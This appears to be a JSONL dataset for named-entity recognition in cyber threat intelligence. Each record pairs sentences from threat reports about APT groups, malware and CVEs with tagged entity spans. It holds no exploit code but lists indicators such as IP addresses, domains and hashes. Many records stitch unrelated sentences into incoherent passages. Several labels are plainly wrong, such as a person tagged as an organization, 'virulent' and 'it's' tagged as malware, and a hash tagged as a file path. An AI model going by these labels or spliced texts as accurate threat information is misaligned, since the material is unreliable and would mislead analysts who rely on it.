{"text": "nis : The su application used to execute shell commands with root privileges . PLATINUM has used several zero-day exploits against their victims . Moafee and DragonOK both use a well-known proxy tool – HUC Packet Transmit MAL ( HTRAN ) – to disguise their geographical locations .", "spans": {"THREAT_ACTOR: PLATINUM": [[79, 87]], "VULNERABILITY: zero-day exploits": [[105, 122]], "THREAT_ACTOR: Moafee": [[147, 153]], "THREAT_ACTOR: DragonOK": [[158, 166]], "MALWARE: HUC Packet Transmit MAL": [[202, 225]], "MALWARE: HTRAN": [[228, 233]]}, "info": {"id": "cyberner_stix_train_003495", "source": "cyberner_stix_train"}}
{"text": "This research identified several bouts of offensive activity that occurred in the past few months , which revealed similar operational methods in which the attackers served malicious documents and other malware executables from web servers to their targets to establish an initial foothold in the network .", "spans": {}, "info": {"id": "cyberner_stix_train_003496", "source": "cyberner_stix_train"}}
{"text": "We were also able to confirm that the phone number he provided to the domain registrar was genuine . Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms . phpschboy.prohosts.org .", "spans": {"MALWARE: regsvr32.exe": [[126, 138]], "THREAT_ACTOR: APT19": [[183, 188]], "ORGANIZATION: law firms": [[220, 229]], "DOMAIN: phpschboy.prohosts.org": [[232, 254]]}, "info": {"id": "cyberner_stix_train_003497", "source": "cyberner_stix_train"}}
{"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . COVELLITE operates globally with targets primarily in Europe , East Asia , and North America .", "spans": {"MALWARE: c:\\temp\\rr.exe": [[54, 68]]}, "info": {"id": "cyberner_stix_train_003498", "source": "cyberner_stix_train"}}
{"text": "There are known related samples that are able to create such directories on removable drives , i.e . the sample with md5: 8cb08140ddb00ac373d29d37657a03cc .", "spans": {"FILEPATH: 8cb08140ddb00ac373d29d37657a03cc": [[122, 154]]}, "info": {"id": "cyberner_stix_train_003499", "source": "cyberner_stix_train"}}
{"text": "Please follow these basic precautions during the current crisis—and at all times : Install apps only from official stores , such as Google Play . We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group – a backdoor we named Okrum . It has been an active operation since August of 2017 and as recently as February 2018 .", "spans": {"SYSTEM: Google Play": [[132, 143]], "THREAT_ACTOR: Ke3chang": [[303, 311]], "TOOL: backdoor": [[322, 330]], "TOOL: Okrum": [[340, 345]]}, "info": {"id": "cyberner_stix_train_003500", "source": "cyberner_stix_train"}}
{"text": "These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": {"VULNERABILITY: CVE-2010-3962": [[14, 27]], "VULNERABILITY: CVE-2014-1776": [[70, 83]], "THREAT_ACTOR: Bahamut": [[156, 163]]}, "info": {"id": "cyberner_stix_train_003501", "source": "cyberner_stix_train"}}
{"text": "It is also another example for why organizations and consumers alike should have an advanced mobile threat prevention solution installed on the device to protect themselves against the possibility of unknowingly installing malicious apps , even from trusted app stores . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries . The group goes further in its social engineering effort : to convince the hotel personnel about the legitimacy of their request , a copy of the National Registry of Legal Entities card ( CNPJ ) is attached to the quotation . Since then , Apple released a new fix for iOS , iPadOS and macOS that reliably fixes the vulnerability again .", "spans": {"TOOL: Corkow": [[296, 302]], "ORGANIZATION: Apple": [[643, 648]], "SYSTEM: iOS": [[672, 675]], "SYSTEM: iPadOS": [[678, 684]], "SYSTEM: macOS": [[689, 694]]}, "info": {"id": "cyberner_stix_train_003502", "source": "cyberner_stix_train"}}
{"text": "During the course of our research , we noticed that we were not the only ones to have found the operation . Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 . As a rule , the initial dropper is created by the infection procedure . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": {"THREAT_ACTOR: Fxmsp": [[108, 113]], "TOOL: NetSupport RAT": [[353, 367]]}, "info": {"id": "cyberner_stix_train_003503", "source": "cyberner_stix_train"}}
{"text": "With further analysis of the Quasar RAT C2 Server , we uncovered vulnerabilities in the server code , which would allow remote code execution .", "spans": {"MALWARE: Quasar RAT": [[29, 39]], "TOOL: C2": [[40, 42]]}, "info": {"id": "cyberner_stix_train_003504", "source": "cyberner_stix_train"}}
{"text": "TABLE OF CONTENTS Security Recommendations Introduction Threat Analysis Common Features Unique Features by Version Malware Under Active Development Suspected Detection Tests by the Threat Actor EventBot Infrastructure Cybereason Mobile Conclusion Indicators of Compromise MITRE ATT & CK for Mobile Breakdown SECURITY RECOMMENDATIONS Keep your mobile device up-to-date with the latest software updates from legitimate sources . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll . The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years .", "spans": {"MALWARE: EventBot": [[194, 202]], "ORGANIZATION: MITRE": [[272, 277]], "MALWARE: thanks.pps": [[452, 462]], "MALWARE: ins8376.exe": [[526, 537]], "MALWARE: mpro324.dll": [[570, 581]], "THREAT_ACTOR: Spring Dragon": [[588, 601]], "ORGANIZATION: government-related organizations": [[662, 694]]}, "info": {"id": "cyberner_stix_train_003505", "source": "cyberner_stix_train"}}
{"text": "DAN GOODIN - 1/23/2017 , 4:39 PM A virulent family of malware that infected more than 10 million Android devices last year has made a comeback , this time hiding inside Google Play apps that have been downloaded by as many as 12 million unsuspecting users . A rudimentary but somewhat clever design , KiloAlfa provides keylogging capability for the Lazarus Group 's collection of malicious tools . This file was likely delivered via a spear-phishing email . We have previously observed targeting in countries including Germany , Denmark , Sweden , France , Poland , Slovakia , Ukraine , Israel , the United Arab Emirates ( UAE ) , and other NATO ally and partner countries such as Japan .", "spans": {"MALWARE: virulent": [[35, 43]], "SYSTEM: Android": [[97, 104]], "SYSTEM: Google Play": [[169, 180]], "TOOL: KiloAlfa": [[301, 309]], "THREAT_ACTOR: Lazarus Group": [[349, 362]]}, "info": {"id": "cyberner_stix_train_003506", "source": "cyberner_stix_train"}}
{"text": "Malicious module “ ip ” This file will be executed by the patched system library . Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text . APT1 . If the target system meets the pre - defined requirements , the malware will use Twitter ( unbeknownst to the user ) and start looking for specific tweets from pre - made accounts .", "spans": {"ORGANIZATION: Talos": [[83, 88]], "THREAT_ACTOR: APT1": [[356, 360]]}, "info": {"id": "cyberner_stix_train_003507", "source": "cyberner_stix_train"}}
{"text": "q= - : As is common with trojans , the communication is always initiated by the trojan on the device to the C2 . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08’s use of PowerShell to conduct malicious activity . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware .", "spans": {"THREAT_ACTOR: ITG08’s": [[223, 230]], "TOOL: PowerShell": [[238, 248]], "THREAT_ACTOR: APT38": [[281, 286]], "THREAT_ACTOR: cyber espionage operators": [[343, 368]], "ORGANIZATION: financial institutions": [[439, 461]]}, "info": {"id": "cyberner_stix_train_003508", "source": "cyberner_stix_train"}}
{"text": "The RTF document 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff was very small in size at 264 bytes .", "spans": {"TOOL: RTF": [[4, 7]], "FILEPATH: 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff": [[17, 81]]}, "info": {"id": "cyberner_stix_train_003509", "source": "cyberner_stix_train"}}
{"text": "messages from IM accounts , including Facebook Messenger , WhatsApp , Skype , Viber , Line , WeChat , Hangouts , Telegram , and BlackBerry Messenger . Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . like this , The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock , a data scientist who worked with the show ’s producers at the Warner Bros. production company Wall to Wall Media .", "spans": {"SYSTEM: Facebook Messenger": [[38, 56]], "SYSTEM: WhatsApp": [[59, 67]], "SYSTEM: Skype": [[70, 75]], "SYSTEM: Viber": [[78, 83]], "SYSTEM: Line": [[86, 90]], "SYSTEM: WeChat": [[93, 99]], "SYSTEM: Hangouts": [[102, 110]], "SYSTEM: Telegram": [[113, 121]], "SYSTEM: BlackBerry Messenger": [[128, 148]], "ORGANIZATION: Symantec": [[151, 159]], "THREAT_ACTOR: BRONZE BUTLER": [[228, 241]], "ORGANIZATION: KrebsOnSecurity": [[424, 439]], "ORGANIZATION: Jeremy Bullock": [[444, 458]], "ORGANIZATION: Warner Bros.": [[523, 535]], "ORGANIZATION: Wall to Wall Media": [[555, 573]]}, "info": {"id": "cyberner_stix_train_003510", "source": "cyberner_stix_train"}}
{"text": "Digital signature verification can be bypassed by giving the malicious file exactly the same name as a legitimate file and placing it on the same level in the archive . Visitors to sites exploited by Emissary Panda are directed by code embedded in the sites to a malicious webpage , which screens their IP address . It will first achieve persistence on the system by writing the in-memory patched parent process to disk to a path specified in the configuration string pool . ThreatConnect Can Help Protect Your Organization from Phishing and BEC Attacks", "spans": {"ORGANIZATION: ThreatConnect": [[475, 488]]}, "info": {"id": "cyberner_stix_train_003511", "source": "cyberner_stix_train"}}
{"text": "Almost all of the strings and behaviors we describe in this analysis of a .NET version are also present in the native version .", "spans": {"TOOL: .NET": [[74, 78]]}, "info": {"id": "cyberner_stix_train_003512", "source": "cyberner_stix_train"}}
{"text": "Trend Micro™ Mobile Security for Apple devices ( available on the App Store ) can monitor and block phishing attacks and other malicious URLs .", "spans": {"ORGANIZATION: Trend Micro™ Mobile Security": [[0, 28]], "TOOL: Apple devices": [[33, 46]], "TOOL: App Store": [[66, 75]], "URL: URLs": [[137, 141]]}, "info": {"id": "cyberner_stix_train_003513", "source": "cyberner_stix_train"}}
{"text": "In recent BitPaymer IR engagements , Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": {"TOOL: BitPaymer IR engagements": [[10, 34]], "ORGANIZATION: Falcon Intelligence": [[37, 56]], "TOOL: FlashPlayer plugin": [[115, 133]], "TOOL: Chrome web browser": [[142, 160]]}, "info": {"id": "cyberner_stix_train_003514", "source": "cyberner_stix_train"}}
{"text": "Design In the manifest , the malware requests a large number of permissions . APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting . The reason that it stayed undetected for so long is partly due to the fact that the trojanized updaters were signed with legitimate certificates ( eg : “ ASUSTeK Computer Inc. ” ) . Each data item fills its location by calling function so , it will become like the following but with the victim collected data .", "spans": {"THREAT_ACTOR: APT10": [[78, 83]], "THREAT_ACTOR: threat actor": [[141, 153]]}, "info": {"id": "cyberner_stix_train_003515", "source": "cyberner_stix_train"}}
{"text": "Similar to Samas and BitPaymer , Ryuk is specifically used to target enterprise environments . Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims .", "spans": {"TOOL: Samas": [[11, 16]], "TOOL: BitPaymer": [[21, 30]], "TOOL: Ryuk": [[33, 37]], "THREAT_ACTOR: Samurai Panda": [[95, 108]]}, "info": {"id": "cyberner_stix_train_003516", "source": "cyberner_stix_train"}}
{"text": "The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives . We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries .", "spans": {"THREAT_ACTOR: Poseidon Group": [[4, 18]], "ORGANIZATION: executives": [[188, 198]], "ORGANIZATION: industrial": [[262, 272]], "ORGANIZATION: engineering": [[275, 286]], "ORGANIZATION: manufacturing organizations": [[291, 318]]}, "info": {"id": "cyberner_stix_train_003517", "source": "cyberner_stix_train"}}
{"text": "On April 20 , Proofpoint observed a targeted campaign focused on financial analysts working at top global financial firms operating in Russia and neighboring countries .", "spans": {"ORGANIZATION: Proofpoint": [[14, 24]]}, "info": {"id": "cyberner_stix_train_003518", "source": "cyberner_stix_train"}}
{"text": "Either of these tools could have been used to exfiltrate the archived data .", "spans": {}, "info": {"id": "cyberner_stix_train_003519", "source": "cyberner_stix_train"}}
{"text": "During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations .", "spans": {"ORGANIZATION: Indian and Saudi Arabian government": [[117, 152]]}, "info": {"id": "cyberner_stix_train_003520", "source": "cyberner_stix_train"}}
{"text": "TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "MALWARE: OwaAuth": [[33, 40]], "TOOL: web shell": [[41, 50]], "TOOL: Exchange": [[54, 62]], "TOOL: ISAPI filter": [[93, 105]]}, "info": {"id": "cyberner_stix_train_003521", "source": "cyberner_stix_train"}}
{"text": "In this case , Yandex Browser , Chromium , 7Star Browser ( a Chromium-based browser ) , and CentBrowser are targeted , as well as versions of Microsoft Outlook from 1997 through 2016 .", "spans": {"TOOL: Yandex Browser": [[15, 29]], "TOOL: Chromium": [[32, 40]], "TOOL: 7Star Browser": [[43, 56]], "TOOL: Chromium-based browser": [[61, 83]], "TOOL: CentBrowser": [[92, 103]], "ORGANIZATION: Microsoft": [[142, 151]], "TOOL: Outlook": [[152, 159]]}, "info": {"id": "cyberner_stix_train_003522", "source": "cyberner_stix_train"}}
{"text": "The group created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": {}, "info": {"id": "cyberner_stix_train_003523", "source": "cyberner_stix_train"}}
{"text": "NATO , Afghan Ministry of Foreign Affairs , Pakistani Military :", "spans": {"ORGANIZATION: NATO": [[0, 4]], "ORGANIZATION: Afghan Ministry of Foreign Affairs": [[7, 41]], "ORGANIZATION: Pakistani Military": [[44, 62]]}, "info": {"id": "cyberner_stix_train_003524", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //nttdocomo-qae [ . Several sources consider APT28 a group of CyberMercs based in Russia . Carbon Black TAU ThreatSight Analysis GandCrab and Ursnif . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": {"THREAT_ACTOR: APT28": [[58, 63]], "THREAT_ACTOR: group": [[66, 71]], "ORGANIZATION: Carbon Black TAU ThreatSight": [[104, 132]], "MALWARE: GandCrab": [[142, 150]], "MALWARE: Ursnif": [[155, 161]], "ORGANIZATION: Bullock": [[164, 171]], "THREAT_ACTOR: Ashley Madison hackers": [[250, 272]], "ORGANIZATION: Biderman": [[284, 292]]}, "info": {"id": "cyberner_stix_train_003525", "source": "cyberner_stix_train"}}
{"text": "Removing the junk instructions revealed a readable block of code . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . The decrypted MUI file contains position-independent code at offset 0 . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"MALWARE: malicious Word documents": [[88, 112]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[141, 205]], "VULNERABILITY: CVE-2014-6332": [[217, 230]], "VULNERABILITY: server - side request forgery ( SSRF )": [[346, 384]]}, "info": {"id": "cyberner_stix_train_003526", "source": "cyberner_stix_train"}}
{"text": "The malicious capabilities observed in the second stage include the following : Upload attacker-specified files to C2 servers Get list of installed applications Get device metadata Inspect itself to get a list of launchable activities Retrieves PDF , txt , doc , xls , xlsx , ppt , pptx files found on external storage Send SMS Retrieve text messages Track device location Handle limited attacker commands via out of band text messages Record surrounding audio Record calls Record video Retrieve account information such as email addresses Retrieve contacts Removes copies of itself if Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers . The group , which first became active in late 2015 or early 2016 , specializes in scanning for vulnerable websites and using this to identify potential targets , either for attacks or creation of command and control ( C&C ) infrastructure . We judge that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": {"ORGANIZATION: Symantec": [[586, 594]], "THREAT_ACTOR: Lazarus": [[621, 628]], "ORGANIZATION: customers": [[666, 675]]}, "info": {"id": "cyberner_stix_train_003527", "source": "cyberner_stix_train"}}
{"text": "] cashnow [ . Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication . By using the and instruction , As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": {"THREAT_ACTOR: Gorgon": [[14, 20]], "ORGANIZATION: CISA": [[199, 203]], "THREAT_ACTOR: LockBit": [[215, 222]]}, "info": {"id": "cyberner_stix_train_003528", "source": "cyberner_stix_train"}}
{"text": "Release_Time : 2016-03-15 Report_URL : https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=62e325ae-f551-4855-b9cf-28a7d52d1534&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "spans": {}, "info": {"id": "cyberner_stix_train_003529", "source": "cyberner_stix_train"}}
{"text": "The variables storing the results of the regular expression matches are used within the ActionScript for further interaction with the C2 server .", "spans": {"TOOL: ActionScript": [[88, 100]], "TOOL: C2": [[134, 136]]}, "info": {"id": "cyberner_stix_train_003530", "source": "cyberner_stix_train"}}
{"text": "Just like we can’t make a definitive determination as to who conducted this campaign , we do not know for sure who it was intended to target .", "spans": {}, "info": {"id": "cyberner_stix_train_003531", "source": "cyberner_stix_train"}}
{"text": "Just 7 days later , on the 26th of January , a component for CosmicDuke was compiled that exploited the vulnerability and allowed the tool to operate with higher privileges .", "spans": {"MALWARE: CosmicDuke": [[61, 71]]}, "info": {"id": "cyberner_stix_train_003532", "source": "cyberner_stix_train"}}
{"text": "A month after observing sample 2 , we obtained another which used the same package name as sample 2 ( cn.android.setting ) . Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests . FANCY BEAR ( also known as Sofacy or APT28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": {"THREAT_ACTOR: APT41's": [[186, 193]], "ORGANIZATION: video game industry": [[215, 234]], "THREAT_ACTOR: FANCY BEAR": [[360, 370]], "THREAT_ACTOR: Sofacy": [[387, 393]], "THREAT_ACTOR: APT28": [[397, 402]], "ORGANIZATION: Aerospace": [[558, 567]], "ORGANIZATION: Defense": [[570, 577]], "ORGANIZATION: Energy": [[580, 586]], "ORGANIZATION: Government": [[589, 599]], "ORGANIZATION: Media sectors": [[604, 617]]}, "info": {"id": "cyberner_stix_train_003533", "source": "cyberner_stix_train"}}
{"text": "Based on the amount of open-source information available on the target , it is feasible that a spear-phishing email may have been used .", "spans": {"TOOL: email": [[110, 115]]}, "info": {"id": "cyberner_stix_train_003534", "source": "cyberner_stix_train"}}
{"text": "It performs a privilege check once every second ; if unavailable , the Trojan starts requesting them from the user in an infinite loop : If the user agrees and gives the application the requested privileges , another stub page is displayed , and the app hides its icon : If the Trojan detects an attempt to revoke its administrator privileges , it starts periodically switching off the phone screen , trying to stop the user actions . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[439, 465]], "MALWARE: malicious files": [[513, 528]], "ORGANIZATION: government": [[594, 604]], "ORGANIZATION: MalwareBytes": [[629, 641]], "MALWARE: DoublePulsar backdoor": [[651, 672]], "MALWARE: SMB worm": [[699, 707]], "VULNERABILITY: Eternalblue": [[752, 763]], "TOOL: SMBv1": [[764, 769]], "VULNERABILITY: exploit": [[770, 777]]}, "info": {"id": "cyberner_stix_train_003535", "source": "cyberner_stix_train"}}
{"text": "In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability .", "spans": {"ORGANIZATION: government officials": [[163, 183]], "THREAT_ACTOR: Patchwork": [[226, 235]], "VULNERABILITY: CVE-2017-0261": [[251, 264]], "VULNERABILITY: CVE-2015-2545": [[398, 411]]}, "info": {"id": "cyberner_stix_train_003536", "source": "cyberner_stix_train"}}
{"text": "] 6 2020-02-29 http : //themoil [ . We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . Charming kitten regularly target international media outlets with Persian-language services .", "spans": {"MALWARE: .NET malware": [[87, 99]], "MALWARE: Topinambour": [[120, 131]], "THREAT_ACTOR: Charming kitten": [[145, 160]], "ORGANIZATION: media": [[192, 197]]}, "info": {"id": "cyberner_stix_train_003537", "source": "cyberner_stix_train"}}
{"text": "Extract logs from Facebook Messenger conversations . The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services . Cybereason suspects that the backdoor may have been obtained in underground communities rather than home-grown , as the evidence found in the code of the backdoor suggests it may have been developed by Ukranian-speaking hackers . Malware detections do n’t matter nearly as much as malware damage — just one ransomware attack can close your business .", "spans": {"SYSTEM: Facebook Messenger": [[18, 36]], "ORGANIZATION: intelligence services": [[212, 233]], "ORGANIZATION: Cybereason": [[236, 246]], "MALWARE: backdoor": [[265, 273]]}, "info": {"id": "cyberner_stix_train_003538", "source": "cyberner_stix_train"}}
{"text": "FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: TEMP.Veles": [[78, 88]]}, "info": {"id": "cyberner_stix_train_003539", "source": "cyberner_stix_train"}}
{"text": "In addition , analysis of these backdoor delivery methods also highlights a trend by many threat actors where they use legitimate storage platforms to deliver the initial stages of the attack .", "spans": {}, "info": {"id": "cyberner_stix_train_003540", "source": "cyberner_stix_train"}}
{"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry .", "spans": {"MALWARE: Microsoft Word document": [[60, 83]], "ORGANIZATION: Dragos": [[342, 348]], "ORGANIZATION: ICS industry": [[394, 406]]}, "info": {"id": "cyberner_stix_train_003541", "source": "cyberner_stix_train"}}
{"text": "Per a 2015 report from CitizenLab , Gamma Group licenses their software to clients and each client uses unique infrastructure , making it likely that the two documents are being used by a single client . The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan .", "spans": {"ORGANIZATION: CitizenLab": [[23, 33]], "THREAT_ACTOR: Gamma Group": [[36, 47]], "ORGANIZATION: infrastructure": [[111, 125]], "ORGANIZATION: Proofpoint": [[274, 284]], "ORGANIZATION: embassies": [[403, 412]]}, "info": {"id": "cyberner_stix_train_003542", "source": "cyberner_stix_train"}}
{"text": "After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": {"MALWARE: SWAnalytics": [[34, 45]], "TOOL: emails": [[241, 247]], "VULNERABILITY: exploit": [[290, 297]], "VULNERABILITY: CVE-2017-11882": [[306, 320]], "VULNERABILITY: vulnerability": [[321, 334]]}, "info": {"id": "cyberner_stix_train_003543", "source": "cyberner_stix_train"}}
{"text": "This also aligns with HenBox ’ s timeline , as in total we have identified almost 200 HenBox samples , with the oldest dating to 2015 . This could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"MALWARE: HenBox": [[22, 28], [86, 92]], "ORGANIZATION: diplomats": [[155, 164]], "ORGANIZATION: journalists": [[261, 272]], "THREAT_ACTOR: attackers": [[279, 288]], "MALWARE: Poison Ivy RAT": [[306, 320]], "MALWARE: WinHTTPHelper": [[325, 338]], "MALWARE: malware": [[339, 346]], "ORGANIZATION: government officials": [[378, 398]]}, "info": {"id": "cyberner_stix_train_003544", "source": "cyberner_stix_train"}}
{"text": "The dropper implements 2 persistence mechanisms :", "spans": {}, "info": {"id": "cyberner_stix_train_003545", "source": "cyberner_stix_train"}}
{"text": "Based on the length of the Dukes ’ activity , our estimate of the amount of resources invested in the operation and the fact that their activity only appears to be increasing , we believe the group to have significant and most critically , stable financial backing .", "spans": {"THREAT_ACTOR: Dukes": [[27, 32]]}, "info": {"id": "cyberner_stix_train_003546", "source": "cyberner_stix_train"}}
{"text": "Each version expands the bot ’ s functionality and works to obfuscate the malware against analysis . If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 . The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years .", "spans": {"MALWARE: it's": [[104, 108]], "TOOL: Cyrillic": [[109, 117]], "TOOL: UTF-16": [[237, 243]]}, "info": {"id": "cyberner_stix_train_003547", "source": "cyberner_stix_train"}}
{"text": "So we decided to write our own plugin code using IDA Python . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . This is probably done by the component that drops and installs this malicious service . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"SYSTEM: Python": [[53, 59]], "THREAT_ACTOR: threat actors": [[86, 99]], "ORGANIZATION: individual": [[134, 144]], "THREAT_ACTOR: Monti ransomware collective": [[281, 308]], "ORGANIZATION: legal and governmental fields": [[374, 403]]}, "info": {"id": "cyberner_stix_train_003548", "source": "cyberner_stix_train"}}
{"text": "Cobalt Strike — This popular and commercially available penetration tool gains shell access to an infected system .", "spans": {"TOOL: Cobalt Strike": [[0, 13]]}, "info": {"id": "cyberner_stix_train_003549", "source": "cyberner_stix_train"}}
{"text": "The payload is actually an HTML Application ( HTA ) file , not an RTF document .", "spans": {"TOOL: HTML": [[27, 31]], "TOOL: HTA": [[46, 49]], "TOOL: RTF": [[66, 69]]}, "info": {"id": "cyberner_stix_train_003550", "source": "cyberner_stix_train"}}
{"text": "Then it sends all that information to the Command & Control server . Adobe Flash Player exploit . FireEye also reported on these attacks in a May 22 blog post .", "spans": {"VULNERABILITY: Adobe Flash Player exploit": [[69, 95]], "ORGANIZATION: FireEye": [[98, 105]]}, "info": {"id": "cyberner_stix_train_003551", "source": "cyberner_stix_train"}}
{"text": "The command & control server ( C & C server ) returns the URL to click along with a very long list of additional parameters in JSON format . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . APT16 actors sent spear phishing emails to two Taiwanese media organization addresses and three webmail addresses . “ Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse , ” the report states .", "spans": {"TOOL: NetTraveler": [[179, 190]], "VULNERABILITY: CVE-2012-0158": [[212, 225]], "TOOL: NetTraveler Trojan": [[241, 259]], "THREAT_ACTOR: APT16": [[262, 267]], "TOOL: emails": [[295, 301]], "TOOL: Microsoft": [[380, 389]]}, "info": {"id": "cyberner_stix_train_003552", "source": "cyberner_stix_train"}}
{"text": "After receiving an unprecedented amount of attention in 2016 , APT28 has continued to mount operations during 2017 and 2018 .", "spans": {"THREAT_ACTOR: APT28": [[63, 68]]}, "info": {"id": "cyberner_stix_train_003553", "source": "cyberner_stix_train"}}
{"text": "A search for this certificate fingerprint on the Internet scanning service Censys returns 8 additional servers : IP address 34.208.71.9 34.212.92.0 34.216.43.114 52.34.144.229 54.69.156.31 54.71.249.137 54.189.5.198 78.5.0.195 207.180.245.74 Opening the Command & Control web page in a browser presents a Basic Authentication prompt : Closing this prompt causes the server to send a \" 401 Unauthorized Response '' with an \" Access Denied '' message in Italian Taidoor spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues . Runs the executable file and deletes the .txt file . “ Who or what is asdfdfsda@asdf.com ? , ” Biderman asked , after being sent a list of nine email addresses .", "spans": {"ORGANIZATION: government": [[486, 496]], "FILEPATH: .txt": [[665, 669]], "ORGANIZATION: asdfdfsda@asdf.com": [[694, 712]], "ORGANIZATION: Biderman": [[719, 727]]}, "info": {"id": "cyberner_stix_train_003554", "source": "cyberner_stix_train"}}
{"text": "The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: Flash exploits": [[53, 67]], "TOOL: Carberp": [[85, 92]], "TOOL: JHUHUGIT downloaders": [[99, 119]]}, "info": {"id": "cyberner_stix_train_003555", "source": "cyberner_stix_train"}}
{"text": "These spear-phishing emails range from ones purposely designed to look like spam messages used to spread common crimeware and addressed to large numbers of people , to highly targeted emails addressed to only a few recipients ( or even just one person ) and with content that is highly relevant for the intended recipient .", "spans": {"TOOL: emails": [[21, 27], [184, 190]]}, "info": {"id": "cyberner_stix_train_003556", "source": "cyberner_stix_train"}}
